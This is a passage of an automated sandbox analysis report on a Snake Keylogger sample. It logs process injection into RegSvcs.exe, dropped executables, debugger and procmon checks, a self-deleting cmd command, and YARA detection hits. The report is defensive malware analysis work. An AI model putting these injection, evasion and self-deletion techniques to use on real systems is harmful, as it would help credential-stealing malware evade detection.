                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECE0520 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,5_2_00007FF75ECE0520
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED12190 FindFirstFileA,FindClose,FindWindowA,5_2_00007FF75ED12190
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008949A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599288Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599062Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598944Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598828Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598607Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597953Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597844Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597609Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597500Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597391Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597278Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597062Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596953Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596842Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596734Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596622Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596515Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596406Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596117Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595877Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595656Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595547Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595404Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595188Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595063Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594952Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594840Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594732Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594624Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594515Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594406Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594295Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594187Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594042Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: EmbeddedExe1.exe, 00000005.00000002.3395288649.000002991F60B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                  Source: EmbeddedExe2.exe, 00000006.00000002.2303172774.00000000012D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeAPI call chain: ExitProcess graph end nodegraph_0-101361
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00903F09 BlockInput,0_2_00903F09
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00893B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00893B3A
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008C5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_008C5A7C
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00894B37 LoadLibraryA,GetProcAddress,0_2_00894B37
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_01500888 mov eax, dword ptr fs:[00000030h]0_2_01500888
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_01501F08 mov eax, dword ptr fs:[00000030h]0_2_01501F08
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_01501EA8 mov eax, dword ptr fs:[00000030h]0_2_01501EA8
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_019824D0 mov eax, dword ptr fs:[00000030h]2_2_019824D0
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_01982470 mov eax, dword ptr fs:[00000030h]2_2_01982470
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_01980E50 mov eax, dword ptr fs:[00000030h]2_2_01980E50
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 8_2_016006C0 mov eax, dword ptr fs:[00000030h]8_2_016006C0
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 8_2_01600720 mov eax, dword ptr fs:[00000030h]8_2_01600720
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 8_2_015FF0A0 mov eax, dword ptr fs:[00000030h]8_2_015FF0A0
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008E80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_008E80A9
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008BA124 SetUnhandledExceptionFilter,0_2_008BA124
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008BA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008BA155
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B8A124 SetUnhandledExceptionFilter,2_2_00B8A124
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B8A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B8A155
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED6AC78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF75ED6AC78
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED84664 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF75ED84664
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4DD008Jump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D31008Jump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008E87B1 LogonUserW,0_2_008E87B1
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00893B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00893B3A
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008948D7
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008F4C27 mouse_event,0_2_008F4C27
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\8kDIr4ZdNj.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe "C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\konked\lecheries.exe "C:\Users\user\AppData\Local\konked\lecheries.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\konked\lecheries.exe" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3Jump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008E7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008E7CAF
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008E874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_008E874B
                  Source: 8kDIr4ZdNj.exe, lecheries.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: 8kDIr4ZdNj.exe, lecheries.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008B862B cpuid 0_2_008B862B
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: MonitorFromWindow,GetMonitorInfoA,GetDesktopWindow,GetClientRect,CreateWindowExW,GetLastError,MonitorFromWindow,MonitorFromWindow,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetWindowRect,GetClientRect,SetWindowPos,CreateBitmap,CreateCaret,SetScrollInfo,GetDoubleClickTime,GetSystemMenu,CreatePopupMenu,AppendMenuA,AppendMenuA,AppendMenuA,CreateMenu,DeleteMenu,DeleteMenu,AppendMenuA,AppendMenuA,GetKeyboardLayout,GetLocaleInfoA,ShowWindow,SetForegroundWindow,GetForegroundWindow,UpdateWindow,MsgWaitForMultipleObjects,PeekMessageW,IsWindow,DispatchMessageW,IsDialogMessageA,PeekMessageA,GetForegroundWindow,MsgWaitForMultipleObjects,DispatchMessageW,PeekMessageW,IsWindow,IsDialogMessageA,5_2_00007FF75ECB53E3
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_00007FF75ED89FB8
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: EnumSystemLocalesW,5_2_00007FF75ED89D30
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: GetLocaleInfoA,DefWindowProcW,5_2_00007FF75ECB1B9F
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: EnumSystemLocalesW,5_2_00007FF75ED89A14
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00007FF75ED89714
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: EnumSystemLocalesW,5_2_00007FF75ED82EDC
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: GetLocaleInfoW,5_2_00007FF75ED823A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED5B700 CreateNamedPipeA,CloseHandle,CreateNamedPipeA,ConnectNamedPipe,GetLastError,CloseHandle,GetLastError,5_2_00007FF75ED5B700
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008C4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_008C4E87
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008D1E06 GetUserNameW,0_2_008D1E06
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008C3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_008C3F3A
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008949A0
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: 8kDIr4ZdNj.exe, 00000000.00000002.2156067931.0000000001589000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165423326.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2164617787.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000002.2180017227.0000000001983000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165894185.000000000197F000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2164112148.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2155325164.0000000001964000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165043158.0000000001987000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe
                  Source: lecheries.exe, 00000002.00000003.2165423326.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2164617787.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000002.2180017227.0000000001983000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165894185.000000000197F000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2164112148.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2155325164.0000000001964000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165043158.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000002.2297579381.0000000001680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2304736561.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPED
                  Source: 8kDIr4ZdNj.exeBinary or memory string: WIN_81
                  Source: 8kDIr4ZdNj.exeBinary or memory string: WIN_XP
                  Source: 8kDIr4ZdNj.exeBinary or memory string: WIN_XPe
                  Source: 8kDIr4ZdNj.exeBinary or memory string: WIN_VISTA
                  Source: 8kDIr4ZdNj.exeBinary or memory string: WIN_7
                  Source: 8kDIr4ZdNj.exeBinary or memory string: WIN_8
                  Source: lecheries.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
